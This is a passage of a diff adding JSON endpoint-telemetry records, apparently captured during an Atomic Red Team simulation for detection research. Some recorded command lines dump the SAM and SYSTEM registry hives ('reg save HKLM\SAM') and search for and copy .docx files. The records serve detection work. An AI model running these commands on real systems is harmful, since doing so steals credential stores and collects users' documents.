2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + 
"image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571775110000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883571800270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + 
"timestamp": 131883571800270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "file", + "file_name": "REGCD01.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571806210000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "file", + "file_name": "REGCD01.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571806210000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "file", + "file_name": "system.hive", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\system.hive", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571807140000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807140000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807140000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "process", + "pid": 2008, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" + }, + { + "event_type": "process", + "pid": 3020, + "process_name": 
"cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3544, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571807430000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + 
"timestamp": 131883571807300000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "command_line": "reg save HKLM\\SAM sam.hive", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2160, + "ppid": 3544, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571807530000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}", + "unique_ppid": "{42FC7E13-CB3C-5C05-0000-001099025101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571807460000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "file", + "file_name": "REGD250.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", + "pid": 2160, + "process_name": "reg.exe", + "process_path": 
"C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "file", + "file_name": "REGD250.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "file", + "file_name": "sam.hive", + "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\sam.hive", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571819800000, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "process", + "pid": 2160, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" + }, + { + "event_type": "process", + "pid": 3544, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + 
"logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1232, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571820020016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + 
"timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "event_type": "process", + "pid": 1232, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571819950016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6036, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571821140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821050000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7980, + "ppid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571821220000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "command_line": "findstr /e .docx", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1572, + "ppid": 6036, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "create", + "timestamp": 131883571821260000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "image_load", + "image_name": "findstr.exe", + "image_path": "C:\\Windows\\System32\\findstr.exe", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + 
"image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": 
"C:\\Windows\\System32\\gdi32full.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571821360000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "process", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" + }, + { + "event_type": "process", + "pid": 1572, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "terminate", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" + }, + { + "event_type": "process", + "pid": 6036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" + }, + { + "event_type": "file", + 
"file_name": "FINDSTR.EXE-4176B665.pf", + "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571821830000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /R c: %%f in (*.docx) do copy %%f c:\\temp\\\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2012, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571822010000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": 
"C:\\Windows\\System32\\KernelBase.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571821990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "event_type": "process", + "pid": 2012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3088, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571822270000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3088, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571822140000, + "unique_pid": 
